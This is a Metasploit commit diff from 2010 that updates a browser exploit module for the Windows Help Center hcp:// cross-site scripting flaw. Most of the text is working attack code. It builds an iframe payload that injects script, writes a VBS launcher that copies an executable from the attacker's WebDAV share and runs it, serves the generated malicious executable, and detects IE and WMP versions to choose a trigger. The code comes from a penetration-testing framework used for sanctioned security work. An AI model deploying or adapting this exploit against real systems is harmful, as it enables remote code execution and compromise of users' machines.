Bug fixes for WMP11 and IE8, new configurable setting for exploit trigger, and output cleanup.

git-svn-id: file:///home/svn/framework3/trunk@9495 4d416f70-5f16-0410-b530-b9f4589650da
unstable
natron 2010-06-11 20:54:35 +00:00
parent 33212ae5ba
commit 7cbc566c7b
1 changed files with 49 additions and 51 deletions

View File

@ -19,7 +19,6 @@ class Metasploit3 < Msf::Exploit::Remote
#
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::CmdStagerVBS
def initialize(info = {})
super(update_info(info,
@ -32,11 +31,13 @@ class Metasploit3 < Msf::Exploit::Remote
scripting vulnerability and a specialized mechanism to launch the XSS trigger,
arbitrary command execution can be achieved.
On IE6 and IE7 on XP SP2 or SP3, code execution is automatic. On IE8, a dialog
box pops, but if WMP9 is installed, WMP9 can be used for automatic execution.
If IE8 and WMP11, a dialog box will ask the user if execution should continue.
Automatic detection of these options is implemented in this module, and will
default to not sending the exploit for IE8/WMP11 unless the option is overridden.
On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it
can be used to launch the exploit automatically. If IE8 and WMP11, either can
be used to launch the attack, but both pop dialog boxes asking the user if
execution should continue. This exploit detects if non-intrusive mechanisms are
available and will use one if possible. In the case of both IE8 and WMP11, the
exploit defaults to using an iframe on IE8, but is configurable by setting the
DIALOGMECH option to "none" or "player".
},
'Author' =>
[
@ -63,20 +64,16 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ], # Only automatic for now.
#[ 'IE6/IE7', { 'trigger_method' => 'iframe' } ], # Only tested IE7 / XP SP2,3
#[ 'IE8/WMP9', { 'trigger_method' => 'asx' } ], # untested
#[ 'IE8/WMP11', { 'trigger_method' => 'asx' } ], # tested, pops dialog box
[ 'Automatic', { } ]
],
'DisclosureDate' => 'June 09, 2010',
'DefaultTarget' => 0))
register_options(
[
#OptString.new( 'CMD', [ true, "The URI-encoded command to execute.", "calc.exe" ]),
OptBool.new( 'RUNWITHDIALOG', [ true, "Proceed with exploit even if it will pop a dialog to the user?", false]),
OptPort.new( 'SRVPORT', [ true, "The daemon port to listen on", 80 ]),
OptString.new( 'URIPATH', [ true, "The URI to use.", "/" ])
OptString.new( 'URIPATH', [ true, "The URI to use.", "/" ]),
OptString.new( 'DIALOGMECH', [ true, "IE8/WMP11 trigger mechanism (none, iframe, or player).", "iframe"])
], self.class)
deregister_options('SSL', 'SSLVersion') # Just for now
@ -112,16 +109,12 @@ class Metasploit3 < Msf::Exploit::Remote
def process_get(cli, request)
#print_status("Responding to GET request from #{cli.peerhost}:#{cli.peerport}")
@my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
webdav_loc = "\\\\#{@my_host}\\#{@random_dir}\\#{@payload}"
@url_base = "http://" + @my_host
if (Regexp.new(Regexp.escape(@payload)+'$', true).match(request.uri))
print_status "GET for payload received."
print_status "Sending payload executable to target ..."
return if ((p = regenerate_payload(cli)) == nil)
data = Msf::Util::EXE.to_win32pe(framework, p.encoded)
@ -130,20 +123,27 @@ class Metasploit3 < Msf::Exploit::Remote
return
end
if request.uri.match(/\.gif$/)
# "world's smallest gif"
data = "GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00!\xF9\x04\x01"
data += "\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"
print_status "Sending gif image to WMP at #{cli.peerhost}:#{cli.peerport} ..."
send_response(cli, data, { 'Content-TYpe' => 'image/gif' } )
end
# ASX Request Inbound
if request.uri.match(/\.asx$/)
asx = %Q|<ASX VERSION="3.0">
<PARAM name="HTMLView" value="URLBASE/STARTHELP"/>
<ENTRY>
<REF href=""/>
<REF href="URLBASE/IMGFILE"/>
</ENTRY>
</ASX>
|
#<REF href="http://www.metasploit.com/images/icbm.jpg"/>
asx.gsub!(/URLBASE/, @url_base)
asx.gsub!(/STARTHELP/, @random_dir + "/" + @start_help)
print_status("ASX file requested. Responding to #{cli.peerhost}:#{cli.peerport}...")
asx.gsub!(/IMGFILE/, @random_dir + "/" + @img_file)
print_status("Sending asx file to #{cli.peerhost}:#{cli.peerport} ...")
send_response(cli, asx, { 'Content-Type' => 'text/html' })
return
end
@ -152,12 +152,8 @@ class Metasploit3 < Msf::Exploit::Remote
if request.uri.match(/#{@start_help}/)
help_html = %Q|<iframe src="hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E">|
#help_html = %Q|<iframe src="hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E">|
#help_html = %Q|<iframe src="hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27TASKKILL%27%29%29%3C/script%3E">|
# stolen from Rex::Text, modified to return fromCharCode happy numbers
rand_vbs = rand_text_alpha(rand(2)+1) + ".vbs"
task_cmd = "taskkill /F /IM helpctr.exe"
copy_launch = %Q^cmd /c copy #{webdav_loc} %TEMP% && %TEMP%\\#{@payload}^
vbs_content = %Q|WScript.CreateObject("WScript.Shell").Run "#{copy_launch}",0,false|
write_vbs = %Q|cmd /c echo #{vbs_content}>%TEMP%\\#{rand_vbs}|
@ -165,11 +161,9 @@ class Metasploit3 < Msf::Exploit::Remote
concat_cmds = "#{write_vbs}|#{launch_vbs}"
eval_block = "Run(String.fromCharCode(#{convert_to_char_code(concat_cmds)}));"
task_kill = "alert(\"foo\");"#"Run(String.fromCharCode(#{convert_to_char_code(task_cmd)}));"
eval_block = Rex::Text.uri_encode(Rex::Text.uri_encode(eval_block))
help_html.gsub!(/COMMANDS/, eval_block)
#help_html.gsub!(/TASKKILL/, task_kill)
print_status("Responding to request for exploit iframe at #{cli.peerhost}:#{cli.peerport}...")
print_status("Sending exploit trigger to #{cli.peerhost}:#{cli.peerport} ...")
send_response(cli, help_html, { 'Content-Type' => 'text/html' })
return
end
@ -196,33 +190,23 @@ if (window.navigator.appName == "Microsoft Internet Explorer") {
// if ie8, check WMP version
if (ver > 7) {
//alert("IE8 detected. Checking WMP version.");
var o = document.createElement("OBJECT");
o.setAttribute("classid", "clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6");
o.setAttribute("uiMode", "invisible");
// if wmp9
// if wmp9, go ahead and launch
if( parseInt(o.versionInfo) < 10 ) {
//alert("WMP9 or below detected. Launching exploit.");
o.openPlayer(asx);
// if > wmp9, but overridden via dialog
// if > wmp9, only launch if user requests
} else {
if( RUNWITHDIALOG ) {
//alert(">WMP9 detected but launching anyway.");
o.openPlayer(asx)
} else { //alert("IE8 with > WMP9 detected. Will not launch exploit.");
DIALOGMECH
}
}
// if ie6 or 7, use iframe
} else {
//alert("< IE8 detected. Launching via iframe.")
// if ie7, use iframe
} else {
launchiframe(ifr);
}
}
} else {
//alert("Non-IE detected. Launching via iframe.");
// if other, try iframe
var o = document.createElement("IFRAME");
o.setAttribute("src", ifr);
document.body.appendChild(o);
launchiframe(ifr);
}
|
@ -232,17 +216,31 @@ if (window.navigator.appName == "Microsoft Internet Explorer") {
</body>
</html>
|
case datastore['DIALOGMECH']
when "player"
mech = "o.openPlayer(asx);"
when "iframe"
mech = "launchiframe(ifr);"
when "none"
mech = ""
else
mech = ""
end
html.gsub!(/JAVASCRIPTFU/, js)
html.gsub!(/DIALOGMECH/, mech)
html.gsub!(/URLBASE/, @url_base)
html.gsub!(/ASXFILE/, @random_dir + "/" + @asx_file)
html.gsub!(/IFRFILE/, @random_dir + "/" + @start_help)
datastore['RUNWITHDIALOG'] ? override = "true" : override = "false"
html.gsub!(/RUNWITHDIALOG/, override)
print_status("Sending exploit html to #{cli.peerhost}:#{cli.peerport} ...")
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, html, { 'Content-Type' => 'text/html' })
headers = {
'Content-Type' => 'text/html',
#'X-UA-Compatible' => 'IE=7'
}
send_response(cli, html, headers)
end
#
@ -324,7 +322,6 @@ if (window.navigator.appName == "Microsoft Internet Explorer") {
print_status("Sending 404 for #{path} ...")
send_not_found(cli)
return
end
# send the response
@ -339,6 +336,7 @@ if (window.navigator.appName == "Microsoft Internet Explorer") {
@asx_file = rand_text_alpha(rand(2)+1) + ".asx"
@start_help = rand_text_alpha(rand(2)+1) + ".html"
@payload = rand_text_alpha(rand(2)+1) + ".exe"
@img_file = rand_text_alpha(rand(2)+1) + ".gif"
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'